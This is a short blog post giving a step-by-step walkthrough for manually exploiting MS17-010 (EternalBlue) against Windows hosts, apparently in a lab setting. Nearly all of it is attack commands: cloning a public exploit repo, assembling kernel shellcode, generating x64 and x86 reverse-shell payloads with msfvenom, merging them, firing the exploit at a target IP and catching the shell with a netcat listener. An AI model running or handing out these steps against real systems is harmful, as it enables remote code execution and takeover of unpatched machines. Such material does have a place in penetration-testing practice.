Manually Exploiting MS17-010 (python2 to python3)

xyzchris0

Chris

Posted on May 5, 2021

Manually Exploiting MS17-010 (python2 to python3)

This is a quick write-up on how to exploit MS17-10 after enumerating your victim machine.

I was trying to run Auto-Blue but with the switch from python2 to python3 I was hitting some hurdles. I read somewhere that you can run pyenv as a workaround but I needed this to work in a crunch. This was pulled from the root4loot blogpost and all thanks really goes to them on this one, check it out! Link

Step 1. Grab the code from https://github.com/worawit/MS17-010

Command:

git clone https://github.com/worawit/MS17-010

Alt Text

Step 2. Display the contents of the folder

Command:

ls -l MS17-010/shellcode/

Alt Text

Step 3. The next step in their walk-through is to assemble both the x64 and x86 shellcode then merge them below. You can get away with only doing 1 but if you dont know the arch then it could not work.

Assemble kernel shellcode with nasm.

Command:

nasm -f bin MS17-010/shellcode/eternalblue_kshellcode_x64.asm -o ./sc_x64_kernel.bin

Alt Text

Step 4. Now generate a binary payload with your LHOST and name it sc_x64_payload.bin.

Command:

msfvenom -p windows/x64/shell_reverse_tcp LPORT=443 LHOST=tun0 --platform windows -a x64 --format raw -o sc_x64_payload.bin

Alt Text

Step 5. Concentrate payload & shellcode

Command:

cat sc_x64_kernel.bin sc_x64_payload.bin > sc_x64.bin
Alt Text

Step 6. Now assemble the kernel shellcode with nasm.

Command:

nasm -f bin MS17-010/shellcode/eternalblue_kshellcode_x86.asm -o ./sc_x86_kernel.bin

Alt Text

Step 7. Then generate a binary payload and label this one sc_x86_payload.bin

Command:

msfvenom -p windows/shell_reverse_tcp LPORT=443 LHOST=tun0 --platform windows -a x86 --format raw -o sc_x86_payload.bin

Alt Text

Step 8. Concentrate payload and shellcode.

Command:

cat sc_x86_kernel.bin sc_x86_payload.bin > sc_x86.bin

Alt Text

Step 9. Now its time to merge them if that's what you would like to do. This will put them in the same binary and included in the eternalblue_sc_merge.py script.

Command:

python MS17-010/shellcode/eternalblue_sc_merge.py sc_x86.bin sc_x64.bin sc_all.bin

Alt Text

Step 10. Now run the exploit. Just as a warning I had to run this multiple times to catch a shell and reverted my box as well.

Command:

python MS17-010/eternalblue_exploit7.py targetIP sc_all.bin

Alt Text

Command:

nc -nvlp 443

Alt Text

💖 💪 🙅 🚩
xyzchris0
Chris

Posted on May 5, 2021

Join Our Newsletter. No Spam, Only the good stuff.

Sign up to receive the latest update from our blog.

Related